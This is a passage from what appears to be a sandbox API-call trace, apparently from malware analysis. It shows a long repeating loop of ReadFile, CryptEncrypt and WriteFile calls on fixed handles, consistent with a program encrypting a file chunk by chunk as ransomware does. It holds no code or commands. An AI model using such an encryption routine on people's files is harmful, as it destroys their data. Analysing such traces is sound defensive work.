lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.353] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.353] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.353] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.353] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.353] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.354] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.354] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.354] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.354] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.354] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.354] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.354] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.354] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.354] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.354] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.354] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.354] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.354] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.355] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.355] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.355] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.355] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.355] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.355] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.355] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.355] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.355] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.355] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.355] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.356] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.356] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.356] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.356] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.356] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.356] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.356] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.356] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.356] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.356] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.356] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.357] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.357] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.357] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.357] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.357] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.357] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.357] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.357] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.357] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.357] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.357] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.358] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.358] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.358] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.358] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.358] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.358] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.358] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.358] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.358] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.358] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.358] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.358] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.359] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.359] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.359] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.359] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.359] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.359] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.359] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.359] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.359] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.359] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.359] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.360] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.360] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.360] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.360] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.360] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.360] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.360] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.360] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.360] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.360] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.360] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.361] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.361] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.361] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.361] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.361] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.361] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.361] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.361] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.361] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.361] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.361] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.361] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.362] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.362] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.362] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.362] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.362] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 